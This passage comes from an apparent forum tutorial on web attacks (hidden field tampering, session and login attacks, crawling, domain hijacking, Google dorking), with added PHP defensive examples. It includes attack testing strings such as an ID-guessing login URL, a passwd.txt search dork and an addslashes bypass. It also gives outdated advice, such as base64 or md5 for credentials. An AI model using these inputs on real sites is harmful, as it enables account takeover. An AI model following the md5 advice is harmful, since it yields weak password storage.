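function bodyTooLarge(array $server, int $limitBytes = 8 * 1024 * 1024): bool {
    return (int) ($server['CONTENT_LENGTH'] ?? 0) > $limitBytes;
}

// Constructed demo: one address repeating a POST, as the loop above would.
$limiter = new RequestLimiter(maxHits: 4, windowSec: 60, blockSec: 600);
$t = 1_000_000;
for ($i = 0; $i < 6; $i++) {
    printf("request %d: %s\n", $i + 1, $limiter->allow('203.0.113.5', $t + $i) ? 'ok' : 'refused');
}
printf("after the block expires: %s\n", $limiter->allow('203.0.113.5', $t + 700) ? 'ok' : 'refused');
print_r($limiter->log());
var_dump(bodyTooLarge(['CONTENT_LENGTH' => '9000000']));
```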


23.)Hidden field manipulation

a)Description

Hidden fields are used for sending a value to the server that is not meant to be edited by the user. But if the user decides to view the HTML source he will see the hidden field, and he can change it.

b)Impact

A remote attacker can change values for different products (if we are talking about a shop or something similar) or cause a server crash

c)Recommendation

Make a function that will not accept any value other than the one the server put in the hidden field

d)References

http://www.securityfocus.com/infocus/1704 -> "Penetration Testing for Web Applications (Part One)" by Jody Melbourne and David Jorm

e)Testing string/s






The attacker sees this and saves the HTML on his hard drive. From then on he just changes the value of 7.10 to, let's say, 2

f)Response

200 OK, acceptance of the value by the server
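As an added example (not code from the original post), this is one way to build the function the recommendation asks for: the hidden value is issued together with an HMAC, so a copy edited from 7.10 to 2 no longer verifies, and a catalogue lookup shows the simpler alternative of not trusting the client for the price at all. The secret key, product id and prices are constructed for the demo.

```php
<?php
// Added example: HMAC-signed hidden field, verified with a constant-time compare.

const FIELD_SECRET = 'replace-with-a-long-random-server-side-secret';   // constructed

// Emit "<productId>:<price>:<hmac>" for the hidden field.
function signHiddenValue(string $productId, string $price): string {
    $payload = $productId . ':' . $price;
    $mac = hash_hmac('sha256', $payload, FIELD_SECRET);
    return $payload . ':' . $mac;
}

// Accept only an untampered value; returns [productId, price] or null.
function verifyHiddenValue(string $field): ?array {
    $parts = explode(':', $field);
    if (count($parts) !== 3) {
        return null;
    }
    [$productId, $price, $mac] = $parts;
    $expected = hash_hmac('sha256', $productId . ':' . $price, FIELD_SECRET);
    if (!hash_equals($expected, $mac)) {
        return null;          // the saved HTML was edited
    }
    return [$productId, $price];
}

// Simpler still: keep the price server-side and send only the product id.
const CATALOGUE = ['widget-1' => '7.10'];   // constructed

function priceFromCatalogue(string $productId): ?string {
    return CATALOGUE[$productId] ?? null;
}

$issued = signHiddenValue('widget-1', '7.10');
$edited = preg_replace('/:7\.10:/', ':2:', $issued);   // the "7.10 to 2" edit above

var_dump(verifyHiddenValue($issued));
var_dump(verifyHiddenValue($edited));
var_dump(priceFromCatalogue('widget-1'));
```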



24.)Authentication attacks

a)Description

Authentication plays a very important role in security. We use it to identify someone by a special value, cookie, session or something like that.

b)Impact

If an attacker brute-forces or somehow obtains the unique identification value of the person he wants, then he can authenticate as that person

c)Recommendation

*Use SSL on your sites
*When a user logs in, his cookie (or whatever the identifier is) has to be unique and used only once. That means that when he logs out the cookie has to be destroyed, and the next time a new one should be created
*Authentication keys should be long and encrypted. Use base64 encoding or md5 hashing
*It would be good to have an IP logging function
*Authorization should be required to prevent spoofing/hijacking attacks

d)References

http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix
http://www.iss.net/security_center/advice/...ing/default.htm -> "Spoofing papers" by Internet Security Systems
http://en.wikipedia.org/wiki/Spoofing_atta...ng_and_phishing -> "Spoofing attack" by Wikipedia
http://www.cs.princeton.edu/sip/WebSpoofing/ -> "Web Spoofing" by Department of Computer Science
http://en.wikipedia.org/wiki/Hijacking -> "Hijacking" by Wikipedia

e)Testing string/s

http://leet.com/login.php?id=4256467

And if an id 4256467 exists, you will be logged in

f)Response

200 OK, successful authentication



25.)Authorization attacks

a)Description

While authentication requires a unique value, authorization requests a username/password value

b)Impact

If an attacker has the username/password value he can log in as the user

c)Recommendation


*Passwords should be long and complex. At least 14 characters long, and containing at least 5-6 special symbols from the keyboard
*Log IPs that make 6 unsuccessful login tries and ban them for 5-10 minutes
*Use md5 hashing
*Use SSL

d)References

http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix

e)Testing string/s







From then on the attacker only tries different username and password combinations to log in

f)Response

200 OK, acceptance of the username and password by the server
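As an added example covering the cookie attacks, authentication and authorization sections (not code from the original post), here is a login/logout pair: the password is checked against a stored hash, a new session ID is issued on every successful login so a session fixed before login is never promoted to an authenticated one, and logout destroys the session so the cookie cannot be reused. It uses password_hash()/password_verify() where the lists above say md5; the user table and password are constructed for the demo, and $session stands in for $_SESSION so it runs from the command line.

```php
<?php
// Added example: hashed-password login with session regeneration and a
// logout that destroys the session.

// Constructed user store (password: "correct horse battery staple").
function userTable(): array {
    return ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];
}

// Returns true and rewrites $session on success, false otherwise.
function login(array &$session, string $user, string $pass): bool {
    $users = userTable();
    // Verify against a throwaway hash for unknown users so response time does
    // not reveal which usernames exist.
    $hash = $users[$user] ?? password_hash('not-a-real-user', PASSWORD_DEFAULT);
    if (!password_verify($pass, $hash) || !isset($users[$user])) {
        return false;
    }
    // With real PHP sessions: discard the pre-login ID and its stored data.
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);
    }
    // Start from an empty array: nothing placed in the session before login survives.
    $session = [
        'user'     => $user,
        'login_at' => time(),
        'token'    => bin2hex(random_bytes(16)),   // fresh per-login value
    ];
    return true;
}

function logout(array &$session): void {
    $session = [];
    if (session_status() === PHP_SESSION_ACTIVE) {
        $_SESSION = [];
        session_destroy();
    }
}

// Demo: a value planted in the session before login (the fixation case above)
// is gone after a successful login, and the wrong password changes nothing.
$session = ['fixed_by_attacker' => 'abc123'];
var_dump(login($session, 'alice', 'wrong password'));
var_dump(isset($session['fixed_by_attacker']));
var_dump(login($session, 'alice', 'correct horse battery staple'));
var_dump(isset($session['fixed_by_attacker']), $session['user'] ?? null);
logout($session);
var_dump($session);
```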



26.)Web pilfering/crawling

a)Description

This attack is used to search a whole site, or parts of it, for password files, hidden fields and other sensitive information

b)Impact

An attacker could get a lot of information about a site and even passwords

c)Recommendation

*Don't hide sensitive data in HTML
*Check your logs for multiple GET requests

d)References

http://en.wikipedia.org/wiki/Web_crawler -> "Web crawler" by Wikipedia
http://en.wikipedia.org/wiki/Distributed_web_crawling -> "Distributed web crawling" by Wikipedia

e)Testing string/s

GET /the_html_document.html
.....

f)Response

200 OK, hidden info



27.)Domain Hijacking

a)Description

This attack is used to take over domain names

b)Impact

An attacker could steal a domain name and from then on use it for phishing scams

c)Recommendation

See the links below

d)References

http://ccpower.info/dhijacking.html#start -> "Domain Hijacking: A step-by-step guide" by CCpower
http://en.wikipedia.org/wiki/Domain_hijacking -> "Domain hijacking" by Wikipedia

e)Testing string/s

See http://ccpower.info/dhijacking.html#start

f)Response

Changed domain settings


28.)Google

a)Description

Google attacks are based on already-known attacks, whose targets are found through search queries

b)Impact

It depends on the hole

c)Recommendation

Remove all pages identified by Google hacking queries

d)References

http://ihackgoogle.com -> Google Hacking Database (GHDB)
http://www.acunetix.com/websitesecurity/google-hacking.htm -> "Google hacking" by Acunetix

e)Testing string/s

inurl:passwd.txt site:yoursite.com

f)Response

200 OK




Final words:

As you can see, in almost all of the attacks the best solution is to allow only a-zA-Z0-9 characters. Well, there are other types of protection methods too, but they could be bypassed. As an example, addslashes could be bypassed with %2527. If you are worrying about how much time it will cost you to scan your site for all these attacks, then you could use some of the following scanners:

Acunetix(http://www.acunetix.com/)
MaxPatrol(http://www.maxpatrol.com/)
Nikto(http://www.cirt.net/code/nikto.shtml)
Nessus(http://www.nessus.org/)
WebInspect(http://www.spidynamics.com/products/webinspect/)
Shadow Security Scanner(http://www.safety-lab.com/en/products/1.htm)
GFI LANguard(http://www.gfi.com/lannetscan/)
Typhon(http://www.ngssoftware.com/products/internet-security/ngs-typhon.php)

Greets: Bl0od3r, EcLiPsE, Acid_BDS, Alpha-fan and everyone from h4cky0u.org
